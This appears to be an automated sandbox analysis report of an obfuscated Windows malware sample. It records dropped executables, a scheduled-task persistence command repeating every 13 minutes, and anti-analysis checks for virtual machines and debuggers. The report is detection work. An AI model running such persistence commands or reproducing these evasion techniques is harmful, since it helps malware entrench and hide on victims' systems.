            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, gWbJ6ofWn0thleHtKg.cs | High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'RY2xDOl1J6srbpVloxZ', 'KADm7nlsYEa7oEU0SKi', 'NycXZklvE89vKDvswgv', 'UX38K3l2LgjEhHZ05QP', 'hKbD9ZlSXZZKUpwKpP0', 'BEgMwAl434lr1V1ujnh'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, ef0HpgoCrdd8r2d8ma.cs | High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'mQVod8lLqWo6qWp6tHR', 'mfy10OlCVuV14accSLb', 'b8XI6Klj4deIdhGGYIG', 'S857hTlYks2oVHL1YPJ', 'kuV1I4lP1f4WeMp7Gpq', 'VqsrEYlZiMwRDhMCIZ6'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs | High entropy of concatenated method names: 'Ahc04aYlep', 'JOT0SjQJwn', 'BhZ0UcbGtI', 'KUF01e7ijn', 'JHL0YUg3dW', 'kJV0O80akc', 'XDD0DX1okJ', 'uB8kit2eRvet0qo39cv', 'obNjYS2BnyLVMjeicHh', 'T39tYB2uy4YFwUKKBap'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, IuS23SyOIu1yyM7BCV7.cs | High entropy of concatenated method names: '_0023Nn', 'Dispose', 'kMGEUjfHbn', 'ityE1JOuS2', 'NSIEYu1yyM', 'KBCEOV7n2q', 'sHMEDOQu96', 'G2smRMG0eDfIxk2wR1w', 'JklfR0GUcvXwnUFL1kE', 'SklmrXGaHKka24hVTg7'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, Trwnkq0fSrRvs7dfIWa.cs | High entropy of concatenated method names: 'sg9', 'cN24eC8HYe', 'VuGCF69ewa', 'sRa4yfjtW9', 'CHgJDCBPXOmaFptw9TC', 'bu7W8FBZeCUlcJZvksm', 'OGEwiwBotXwku5sIAB2', 'q78AwIBjRYTMr3O5cmM', 'wQM5OZBYro4H4Gkd1WE', 'k7L96uBWg8Cj3oZRkHu'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, odywsCMY8nmoCLVyGio.cs | High entropy of concatenated method names: 'F9jXOHW2Cd', 'miaqs4Lqd8UecSbK8te', 'ey5KuaL9vwTAoW1PZaG', 'l3SehJLiCaOwIg8yM77', 'UM36PkLX5kxYQFITEpF', '_1fi', 'gKSlxo0xep', '_676', 'IG9', 'mdP'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, naT0BRE0EX692LCiNbZ.cs | High entropy of concatenated method names: 'qN7c1oNBiPUWRnbEmfS', 'jnfBa4NuGwWLk4HvXpm', 'tBA1w9NDflsTNZ61bdo', 'eRuUlkNxZvN5PwfrW1d', 'hBFRAwIks1', 'G7WLBlNtsLCuxsQdsYY', 'WNsaL3NdaQqAc4bQ65W', 'WKIAVfNeqGt3YkAwv7f', 'c1qgU8NyxHQNTCjCYwW', 'JIv60PNiVfcuh1SHSgE'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, gZcbGteLI7UFe7ijnDH.cs | High entropy of concatenated method names: 'tEwyekNTDs', 'KjOyyFJcuc', 'I3ty03wifu', 'GQasEpUWNocyLBb7sLo', 'LBymfTUK8JfxsVLPtLg', 'CKsdKRUZ6K7KaqMIVQR', 'kIf0CBUoqTqc6B8Mwc7', 'JUOo7KU5VitNwbrx5tf', 'eQn2LQUJAksSm3DCMFb', 'IwfJwhUV8P3H2viaZvf'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, kdGR4VeBXM7TZUvOplj.cs | High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'Gubo4jadLoLnsvVYfIB', 'QaPiF3aiVBXbndTBwnm', 'memLUZaXEPTnhPIkJMu', 'KYxXL4aqqUCZF1sGAoa', 'LULv4ga9110Ygti7eVZ', 'COxiXMaA7Gs9kgjhdd5'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, rAFmgbeu5wDx503H1id.cs | High entropy of concatenated method names: 'SCtyK2xd46', 'SfGKP5sQjqrgdNdLYym', 'nToGynsaGjoisLnmRHJ', 'bddUXdsleGMHw70du6s', 'nmnasasMk0j5yURgaxp', 'R8IxegsFCkyT9gLoNpj', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, DUR8LQ0xq44XUwqN9Ax.cs | High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'zAxJT03TRs', 'GXn4Bfkf9v', 'd7aJtP59nA', 'deq4aVesFS', 'dn8T7SucNKmx70MWwIB', 'f4Vc4tuReN1tnFWou8p', 'l2p7DPuh6AaMeWC51Iw'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, k3RVZs0zMcHGl6WB4dB.cs | High entropy of concatenated method names: 'caRJlXXEay', 'c4VJXQx12f', 'BJ9JNhJjt9', 'e7or3keOBqJSBxVyiRf', 'Lyw7amewv72tad1MwYQ', 'GR2KekeRphhZqt1OmdD', 'bv8NA2eblnbNCb9HxsY', 'DieY5KeLbUCZ2GpTlpe', 'xjQiCDeC6ZnjJCBZZLV', 'vxdsDYejWHoEq0GEqb8'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, Fa6Vna0e6TXdFs5VBRv.cs | High entropy of concatenated method names: 'V5XhNbgeSr', 'il3hPGoBMr', 'NoNhQsIghx', 'WCfh43Pmdv', 'AAaCFvnzxNC1ERYNM26', 'X2tL8HnkTPVJFEA5dfw', 'pvPA6WnHpT9dkq54MPK', 'xpxO5kI8IXIyYtf7J4S', 'LgVSYZI7faDYSf4g5ZW', 'Vl4tp4IrKXDH3Pi5LEA'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, uUm8wME5pmnrwANqPMC.cs | High entropy of concatenated method names: 'raNml3yQfW', 'R2jmXCs2bQ', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'oEemN3cI3A', '_5f9', 'A6Y'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, GYGQHyexBYhUbqx30rE.cs | High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'tbTcf31AOexw7D93TN9', 'eAqiSD1NIpxEGpsy6Xv', 'w9iAEh1pMYCQdQSXUnJ', 'B25SBG1mavFouugBtqY', 'BXwdMt1hwOSXf2aJeXJ', 'XbMr6O1fBmAxUNJh6nO'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, mq5Db7eXnJMFmFpGcQk.cs | High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'SNZIK40hKVL83D6oStu', 'GooYaF0fSi9oIf1ZGxp', 'JyoMwJ0c2X1dfQiXMUZ', 'PrGH6s0RDnH4AvqdBMX', 'EOGwQL0bN6duWfIkOtf', 'OlbD6R0O2BROMHkSddb'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, P3Jn3UeKsFiuOcGw3Zc.cs | High entropy of concatenated method names: 'ToWeNn0thl', 'JBHLIgFGXoEC3DlOiGO', 'VLISMyFnrOFQ5NeJceP', 'P6dNVGF6oFcKpMFcuet', 'qMCRffFEexmBWNE2SOw', 'ldOwCRFIFb2axCqnFcV', 'DBM2cGF34XIMVXffvMq', 'DOCWi1FDnhLcSpOwmt0', 'c4y9VrFxv7d8jKmn7As', 'f28'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, BJPgMuMst6jyinFZ1c9.cs | High entropy of concatenated method names: 'IGD', 'CV5', 'cOTIAEpoUY', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, flIfbbEbGPCMS81YOa7.cs | High entropy of concatenated method names: 'UAvmiTHGQ0', 'LNamEIeKp3', 'UVsmM7CcXy', 'H1ZmhQ8Cib', 'mQwmH18Ftq', 'uhvmCsdU1k', 'cAXmJXb7rH', 'C50mT9TIqB', 'hyMmtp96cc', 'Fg2mBE3Ag8'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, tbPZLbejUXIwgHXlRYR.cs | High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'ouXvK9FeTOpSKJr9y3n', 'WrgUHiFynMUVBG0AKeQ', 'cW8OvQFtYksLtKhmuql', 'xfH1CEFdt0PlCk4gWcw', 'n0EuCNFiCZpBSJVhXyo', 'BfNNc3FXETQdpg8U5tD'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, kZU4ZoE4GhHSec8HhnZ.cs | High entropy of concatenated method names: 'le7A6qLB9C', 'EUhAWlouPE', 'MgcAbxvsfN', 'S5NAu9RRQE', 'W17A2n4gAb', 'V69AFYYW5P', 'saOL2WfPjFrdRTUyorW', 'xorAaYfjq3GN0GulqsF', 'MA5pq7fYOBYwuKSjuCD', 'FlB7qFfZQaUjH7Z7Qrr'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, QK5fu5ILhJLQrnd7n7.cs | High entropy of concatenated method names: 'wMUU3tpHS', 'qN11ags0H', 'uFPYwA75N', 'kOsHVQ7clhRlH92wYFW', 'Asa2g57hcqJmG9xBMip', 'Ix67gk7fjailwRS8NOE', 'znKArE7RQuvmGUdiT24', 'fb6TJg7bIUDU1n0gW0v', 'n7b47Q7OvXKvoHU1qZg', 'hoDsVY7wEdbvXyMlrV0'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, A8VlubeUThWKtOlQGJ2.cs | High entropy of concatenated method names: 's9neWgk8JS', 'xtNDq6UedkiBF5huhlh', 'kxWxWjUyARWZxvXXMry', 'pijHxIUBXyrS7lLw6MX', 'ONQpChUu5lmFDFLCfKl', 'QuuMX8UtdAOSBYRVTfc', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, rIUPTqyv0mFLDB197Oh.cs | High entropy of concatenated method names: 'gb10uYGQHy', 'r5LeicSTpd66aP7280a', 'MyHCtWSleY9knWv4kjm', 'TewD4dS7JSlQjY6NYiZ', 'Q1a5fXSrjGu0fISpLa5', 'Eln081SMnXpP9Pq3xEw', 'BElpfjSQn6is3i3i7QO', 'CZhoBvSac28I8GOVkUu', 'delSoJSF2r9uGvF7ZFN', 'M92UbSS0FT7DUtO3JUp'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, sXXEayiF04VQx12fNJ9.cs | High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, Td46UtehAm9bYCXRpgi.cs | High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'hFHOEDQJehigAKeefHv', 'aogIaUQVwbvX22Axdpm', 'agwFKOQgP2RZ7p3Con8', 'FEwVDOQkiLiVWQ1Lsjr', 'lKbVpVQHL8QuHDgoqYX', 'rBEkiPQzQG2wQh6Qjpu'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, ViSyov0paoPhttRQjWc.cs | High entropy of concatenated method names: 'lUcHnMqtcg', 'BvJHk3Rlkj', 'UsGHx49M4c', 'gTELOYDjI1XoECuR0NZ', 'qa4RghDYtLcygVcTEZ5', 'JLdLWZDPE03EgAXKVli', 'OcFcriDZe3fL0mQxmPL', 'H8LwLYDoalMuM7wnMF7', 'iGBuhHDW8ZBxtNbXKu5', 'CTdIGNDKRsggKLvfQyj'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, x4qoeFenoMY5Nwnhxgo.cs | High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'luYHJv1DwsxV3bLkStc', 'l7X9B41x1OWvgnPs7av', 'yqDUNE1B1LlPDmWPXgC', 'o4JG3C1uhEmRf9akGBw', 'kSOPlD1e8QHpj9udcLw', 'WAm1e51y79tXU0qpVaN'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, rpOvYn0JXt9UlRdMrE0.cs | High entropy of concatenated method names: 'UEMHSwcVLj', 'wDZHUZqEKS', 'RQOH1Ld0ZB', 'vfq1bGDSsv1GoyPRQMb', 'TgDxLoDvd3k4gDuxZib', 'vJvcxID2t9hqq3nmAu8', 'zAGwmrD4mVFxlwjDoll', 'OpBHro2MPo', 'j4THpeSaVU', 'APuHqmqLtn'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, OEp1t0MmUo1X7A9v3Cv.cs | High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, jjUHFcE2TjVQ77TM60B.cs | High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'iFems1l7Up', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, oXYBxRydUnqpsq5HQol.cs | High entropy of concatenated method names: 'rI80zviutf', 'hTOignr2Ye', 'ahdiejpKT3', 'CgSiyCtuFo', 'RSOi0luqKA', 'Ymgiib5wDx', 'Y03iEH1idP', 'QrhiMZyrdh', 'iPPih2BXHw', 'MMriHD03p7'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, SHenvQiA4AUUBVwJjKy.cs | High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'G0gag1AIBj', '_3il', 'whnae8Dajm', 'Usyayjxrlo', '_78N', 'z3K'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, sv9HOiMMUW8SOrA4dWU.cs | High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, iYxtO5evyoBy7QXA3qG.cs | High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'lJcXuMaRA7vEopsaGeR', 'aK5tInabi82x0WatXat', 'KRmto5aOEMDv9ClAlTt', 'QKHodTawE3inhWp27DD', 'dameJkaLeZD7W9xLr88', 'FJN2W4aCyejKaAt0wAn'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, lj1laTzGDxu613i1FI.cs | High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'bM3ZJQQTVw43IjuCbtL', 'vcsZPjQlsPxDpE4wWBc', 'UnM8xlQMDIEiVAwEq5D', 'nCrXWCQQhsuGUOgCgUr', 'zOYNIuQadpEvmw8xeWm', 'V7y0baQF91a8cVnZiTH'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, KDktn6iWXVSFMxslT5o.cs | High entropy of concatenated method names: 's7mvFGPkN8', 'L65vUr4Xqb', 'mZrv1x4mvx', 'lgvvYDtlwh', 'xK3vOhZWVx', 'JChvDioi6R', 'dGVv7UM4H8', 'DvLvLcXIh5', 'cWLvfNf8Dv', 'pZyvZNE6o3'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, lY6Co0F9EwkNTDs7jO.cs | High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'onq8U5M5cRBX0df75RG', 'WJGJknMJtV6oIus04Ag', 'i3FJwtMVXHetqVtjCds', 'FalhKgMgJjAA71Y0NaV', 'mfIYkDMkhGVim9VXeSW', 'YacK1iMHeDqTqpTXKWS'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, VEvtpDhamCVIMfRdDDD.cs | High entropy of concatenated method names: 'iryag2jtV5GabvjdoCK', 'XAV83fjdIOLkn9FNa3X', 'Ip6hkCjewXQSgniY08f', 'iitCanjyD2NkvPsVrbk', 'Nb6QvJFACJ', 'drcN0RjqwIqiIdL6MgI', 'aixyMdj9Af4vgTJy9G3', 'bj0S9GjAKZIfCMOsq2f', 'OpYPASjNCbTvQnXLyKO', 'yEZbUWjpoBng1FUZmJJ'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, KU2FtYQFDMdkRnKiqt.cs | High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'cqE7KKKeJ', 'wgdRBJrIrRHJa7U3GXI', 'lTHPcDr3AHBKyqdYPEx', 'aBgkgRrDRSf6XRWrL1t', 'BSAWYTrxRJexBmqaNww', 'OaIdNlrBo6A5CroqSwp'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, FGj9YGiwAmn2M0yQIdU.cs | High entropy of concatenated method names: 'qSeaSNU3b0', 'ln6aUI6961', 'Xcma1qtJM0', 'fKcaY0CPM6', 'OfIaOrQhQt', 'IZWPbwdI9BvQq3Di0eC', 'aGTTw4dGTrskNJlwDrb', 'bRivXydnitIio8WcG0l', 'chZXjGd3gTRtqQAZBLe', 'DpZQx9dD0kUvuJ47rZl'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, G0g1AIMSBjshn8DajmW.cs | High entropy of concatenated method names: 'xutZPPLl6iX6dvYcx8W', 'PQLPh1LMRd6Zb1PWmUg', 'DUSHsFLrcyg0xJxT6yv', 'OOfIGqLTDeXIWQBxhUD', 'eUDwUuvO0x', 'WM4', '_499', 'E2iw1IP050', 'ywawYpjUOI', 'JuCwO7tKIZ'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, w7Jk5Zee6v5air8K1QP.cs | High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'W0AAtkQIRBNrTIjbLKc', 'AOXrsGQ3e2jgjsPa9TV', 'FCa5EXQDiSGmPunwMjH', 'TptmuAQxf7ThmNFvMac', 'qlFrf4QBwGMbi1FUyog', 'KtXFyJQu4lS2RcIPjVf'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, jq2KiSnrjU9jHvH4sl.cs | High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'FXnuLGMQJ8yZJHD6179', 'DUhgWIMaZApXlYTudxq', 'loD8t7MFg3tinMqQrT9', 'cFGAV9M0Uqtt5ms8k7R', 'y96N9vMUJD5L2qTGHrV', 'OgEM21M1n11maTf2S8Z'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, lFI6QRM3bSQ7bMRLkfE.cs | High entropy of concatenated method names: 'PJ1', 'jo3', 'dUcNCoOYuI', 'uT8NJkNGfY', 'lICNTr21TS', 'EC9', '_74a', '_8pl', '_27D', '_524'

            Persistence and Installation Behavior

            Source: C:\winSaves\fontsavesbroker.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (reported 6 times)
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | File created: C:\winSaves\fontsavesbroker.exe
            Source: C:\winSaves\fontsavesbroker.exe | File created: C:\Windows\Cursors\SearchApp.exe (reported 2 times)
            Source: C:\winSaves\fontsavesbroker.exe | File created: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe

            Boot Survival

            Source: C:\winSaves\fontsavesbroker.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\SearchApp.exe'" /f
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (reported 3 times)
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\fontsavesbroker.exe | Process information set: NOOPENFILEERRORBOX (reported 50 times)
            Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe | Process information set: NOOPENFILEERRORBOX (reported 52 times)
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\winSaves\fontsavesbroker.exe - Process information set: NOOPENFILEERRORBOX (33 occurrences)
Source: C:\winSaves\fontsavesbroker.exe - Memory allocated: 1420000 memory reserve | memory write watch
Source: C:\winSaves\fontsavesbroker.exe - Memory allocated: 1AD90000 memory reserve | memory write watch
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Memory allocated: 2CE0000 memory reserve | memory write watch
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Memory allocated: 1AE80000 memory reserve | memory write watch
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Memory allocated: 1370000 memory reserve | memory write watch
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Memory allocated: 1AFF0000 memory reserve | memory write watch
Source: C:\winSaves\fontsavesbroker.exe - Memory allocated: DB0000 memory reserve | memory write watch
Source: C:\winSaves\fontsavesbroker.exe - Memory allocated: 1AA50000 memory reserve | memory write watch
Source: C:\winSaves\fontsavesbroker.exe - Thread delayed: delay time: 922337203685477
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Thread delayed: delay time: 922337203685477
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Thread delayed: delay time: 922337203685477
Source: C:\winSaves\fontsavesbroker.exe - Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe - Window found: window name: WSH-Timer
Source: C:\winSaves\fontsavesbroker.exe - Window / User API: threadDelayed 1182
Source: C:\winSaves\fontsavesbroker.exe - Window / User API: threadDelayed 981
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Window / User API: threadDelayed 368
Source: C:\winSaves\fontsavesbroker.exe - Window / User API: threadDelayed 891
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Evasive API call chain: GetLocalTime,DecisionNodes (graph_0-23010)
Source: C:\winSaves\fontsavesbroker.exe TID: 2680 - Thread sleep count: 1182 > 30
Source: C:\winSaves\fontsavesbroker.exe TID: 2680 - Thread sleep count: 981 > 30
Source: C:\winSaves\fontsavesbroker.exe TID: 2668 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 7156 - Thread sleep count: 368 > 30
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 5316 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 3992 - Thread sleep count: 336 > 30
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 3992 - Thread sleep count: 82 > 30
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe TID: 2816 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\winSaves\fontsavesbroker.exe TID: 2496 - Thread sleep count: 891 > 30
Source: C:\winSaves\fontsavesbroker.exe TID: 2016 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed (2 occurrences)
Source: C:\winSaves\fontsavesbroker.exe - File Volume queried: C:\ FullSizeInformation
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - File Volume queried: C:\ FullSizeInformation
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - File Volume queried: C:\ FullSizeInformation
Source: C:\winSaves\fontsavesbroker.exe - File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004EDD72 VirtualQuery,GetSystemInfo
Source: C:\winSaves\fontsavesbroker.exe - Thread delayed: delay time: 922337203685477
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Thread delayed: delay time: 922337203685477
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Thread delayed: delay time: 922337203685477
Source: C:\winSaves\fontsavesbroker.exe - Thread delayed: delay time: 922337203685477
Source: C:\winSaves\fontsavesbroker.exe - File opened: C:\Users\user
Source: C:\winSaves\fontsavesbroker.exe - File opened: C:\Users\user\Documents\desktop.ini
Source: C:\winSaves\fontsavesbroker.exe - File opened: C:\Users\user\AppData
Source: C:\winSaves\fontsavesbroker.exe - File opened: C:\Users\user\AppData\Local\Temp
Source: C:\winSaves\fontsavesbroker.exe - File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\winSaves\fontsavesbroker.exe - File opened: C:\Users\user\AppData\Local
Source: j0GOUGjcJD.exe, 00000000.00000003.1678795891.00000000033F1000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: fontsavesbroker.exe.0.dr - Binary or memory string: HVMCIkvIdr
Source: fontsavesbroker.exe, 00000004.00000002.1803962500.000000001BBC6000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: w32tm.exe, 0000000D.00000002.1852263700.0000026D2A7B9000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - API call chain: ExitProcess graph end node (graph_0-23401)
Source: C:\winSaves\fontsavesbroker.exe - Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004F753D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004FB710 GetProcessHeap
Source: C:\winSaves\fontsavesbroker.exe - Process token adjusted: Debug
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Process token adjusted: Debug
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Process token adjusted: Debug
Source: C:\winSaves\fontsavesbroker.exe - Process token adjusted: Debug
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004EF063 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004EF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
